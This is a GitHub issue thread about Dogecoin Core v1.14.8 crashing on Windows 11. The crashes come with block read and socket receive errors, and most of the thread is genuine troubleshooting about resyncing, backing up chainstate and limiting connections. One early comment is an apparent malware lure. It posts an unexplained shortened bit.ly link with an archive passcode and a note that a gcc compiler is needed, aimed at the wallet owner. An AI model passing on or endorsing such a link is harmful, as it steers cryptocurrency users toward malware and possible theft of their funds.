### ISSUE TITLE
[bug] Wallet Randomly Crashes Since August (late July)

### ISSUE THREAD

**Issue by CryptoEconomize** [dogecoin/dogecoin#3639]
Apparently I am the only one having this issue.

My wallet has been randomly crashing since the last week of July 2024.  I was getting a cpp crash error window that would display and this would be in the debug log.

ERROR: ReadBlockOrHeader: Deserialize or I/O error - CAutoFile::read: fread failed: iostream error at CBlockDiskPos

Which I assumed was possibly a hdd issue except I haven't any issues with any other wallets and this hdd is used on a server which hosts other nodes.

When it does this I can restart the wallet and it will sometimes sync and run fine and be useable and then it will randomly get this error again.  Other times, it will crash after it rewinds blocks and tries to sync again.

My only resolution is to delete the blockchain and allow the wallet to resynch and rebuild the database again.  Then it runs fine for a while and then another crash.

I am not getting any errors with the current crashing and am in the process of resyncing, again.

This node has been running for over 8 years and this is the first instance I have had any issues with it.

**Dogecoin Core version**
Dogecoin Core version v1.14.8

**Machine specs**
- OS: Windows 11
- CPU: i97980XE
- RAM: 64GB
- Disk size: 2TB
- Disk Type (HD/SDD): HDD

**Comment by fayaznasrati** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by CryptoEconomize** [comment]
I reopened this issue.   

I finished resynching yesterday and currently have my incoming connections disabled to test to see if I still run into a crashing issue without any incoming connections.

It seemed to me like there was an issue with peer / data causing my blockchain directory to corrupt and thus cause my wallet to crash so will keep incoming connections off for a while until I know for sure whether that was the source of the corruption.  

Will post a follow up when / if I know more.

**Comment by victorsk2019** [comment]
Hi
> When it does this I can restart the wallet and it will sometimes sync and run fine and be useable and then it will randomly get this error again. Other times, it will crash after it rewinds blocks and tries to sync again.

This sounds remarkably similar to the issue I had with my Mac a while ago, an SSD/HDD hybrid, with a faulty logic board (I think it was just a lemon I bought ;)).  In my case the recurring error was "checksum mismatch" .

> My only resolution is to delete the blockchain and allow the wallet to resynch and rebuild the database again. 

Same, what I did was keep a backup copy of `blocks` and `chainstate` directories of most successful synchronization "snapshot" and whenever the issue occurred I replaced `blocks` and `chainstate` with this successful backup copy without having to re-index everything from genesis block again.  Hopefully, this approach may be useful for you as well and save time on re-syncing entire blockchain, if you are not already familiar with it already.  That's, until more permanent solution is not found.

 `ERROR: ReadBlockOrHeader: Deserialize or I/O error - CAutoFile::read: fread failed: iostream error at CBlockDiskPos`

Seems like file I/O error.  Maybe you could provide additional error trace in `debug.log` surrounding this error?  Thanks.

**Comment by CryptoEconomize** [comment]
> Hi
> 
> > When it does this I can restart the wallet and it will sometimes sync and run fine and be useable and then it will randomly get this error again. Other times, it will crash after it rewinds blocks and tries to sync again.
> 
> This sounds remarkably similar to the issue I had with my Mac a while ago (Dogecoin Core 1.14.5), an SSD/HDD hybrid, with a faulty logic board (I think it was just a lemon I bought ;)). In my case the recurring error was "checksum mismatch" .
> 
> > My only resolution is to delete the blockchain and allow the wallet to resynch and rebuild the database again.
> 
> Same, what I did was keep a backup copy of `blocks` and `chainstate` directories of most successful synchronization "snapshot" and whenever the issue occurred I replaced `blocks` and `chainstate` with this successful backup copy without having to re-index everything from genesis block again. Hopefully, this approach may be useful for you as well and save time on re-syncing entire blockchain, if you are not already familiar with it already, that is, until better solution is found.
> 
> `ERROR: ReadBlockOrHeader: Deserialize or I/O error - CAutoFile::read: fread failed: iostream error at CBlockDiskPos`
> 
> Seems like file I/O error. Maybe you could provide additional error trace in `debug.log` surrounding this error? Thanks.

I haven't been able to recreate the crash with incoming connections disabled but it seemed the crash maybe was related to trying to read an incoming block that was above a threshold which causes the wallet to close to prevent the system from running out of memory, maybe caused from older code left over from an older Bitcoin fork because the first error I had encountered seemed related to memory and block size.

If I don't crash again by tomorrow I'll enable incoming connections again and see if I can reproduce the crash and get some type of error trace from the debug log.   After I resynched the last time I wasn't getting an error, instead the wallet would just close itself and not produce any error.  Prior to resynching that time I was getting a cpp error window which had that above error but I don't get that error popup anymore nor find anything in the debug log showing there was an error.  Seemed the debug log would just stop printing when the wallet closed.

**Comment by CryptoEconomize** [comment]
I looked through a saved log that shows when it crashed the last time.

2024-09-01 10:21:22 socket recv error An existing connection was forcibly closed by the remote host.  (10054)

That's where it ends without any additional data.

**Comment by CryptoEconomize** [comment]
Ok so no crash / error with incoming connections disabled.  However, I want to be able to enable them again so I can run a full node.  Backing up db files this time in case it crashes again so I don't have to resync from the beginning.

**Comment by victorsk2019** [comment]
When you ran full node previously and it all worked did you specify number of maxconnections?

**Comment by CryptoEconomize** [comment]
> When you ran full node previously and it all worked did you specify number of maxconnections?

No.

**Comment by CryptoEconomize** [comment]
I have the node receiving incoming connections again now.  I also think I limited maxconnections to 20 but I did I am not sure how to tell if its set or not, nor how to remove the maxconnections if you wanted to remove it after setting it.

Will see if it crashes again.

**Comment by victorsk2019** [comment]
> I have the node receiving incoming connections again now. I also think I limited maxconnections to 20 but I am not sure how to tell if its set or not.
> 
> Will see if it crashes again.

Yes, limiting number of connections is the only thing I can think of.  I checked `net.cpp`'s `ThreadSocketHandler()` function (I could be wrong on this one) but I think the issue could be caused by a "race condition" with multiple threads (connections) attempting to access the resource (your node) at the same time ultimately resulting in `socket recv error `.  That's the only cause I can think of.  Maybe somebody else may have better idea :)

**Comment by CryptoEconomize** [comment]
Seems that may have solved the problem.  Ill close ticket.  If issue presents itself again I'll reopen it.  Thanks.

**Comment by CryptoEconomize** [comment]
Seems that may have solved the problem. Ill close ticket. If issue presents itself again I'll reopen it. Thanks.

**Comment by CryptoEconomize** [comment]
I'm still having this issue.  Now my wallet just closes randomly (with no errors or warning).  Sometimes it will sync and then close, other times it will close while trying to sync.

The debug log leaves nothing to show that the wallet even closed, in the debug log it just stops printing without any errors.

**Comment by CryptoEconomize** [comment]
I also can't find an option to reopen this ticket.

**Comment by slightlyskepticalpotat** [comment]
If you haven't done so yet, this would be a great time to make a backup of your wallet.dat on another device.
